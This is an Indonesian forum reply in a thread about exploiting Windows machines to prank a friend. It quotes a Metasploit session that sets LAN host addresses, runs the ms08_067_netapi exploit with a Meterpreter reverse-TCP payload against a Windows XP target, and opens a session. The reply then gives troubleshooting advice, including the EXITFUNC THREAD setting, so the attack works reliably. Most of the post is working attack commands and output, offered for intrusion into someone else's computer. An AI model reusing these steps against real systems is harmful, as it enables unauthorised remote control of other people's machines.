Exploit Windows ga pake Backdoor + ngerjain temen
#23
(02-10-2012, 05:26 PM)xCode Wrote: om,kalo hasilnya kayak gini kudu gimana ya?

sf exploit(ms08_067_netapi) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.11
RHOST => 192.168.1.11
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.11
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.11:1130) at 2012-02-10 16:23:27 +0700

meterpreter > [-] Failed to load extension: undefined method `<=' for nil:NilClass
[-] Failed to load extension: undefined method `<=' for nil:NilClass

menurut hdmoore di metasploit, dapat dilihat disini:
http://dev.metasploit.com/redmine/issues/4389

itu karena EOF error yang disebabkan oleh tertutupnya socket tidak dapat diikuti oleh exploit tsb

coba masukkan angka parameter EXITFUNC THREAD di payloadnya, trial n error


Messages In This Thread
RE: Exploit Windows ga pake Backdoor + ngerjain temen - by iKONspirasi - 02-10-2012, 06:07 PM




Users browsing this thread: 1 Guest(s)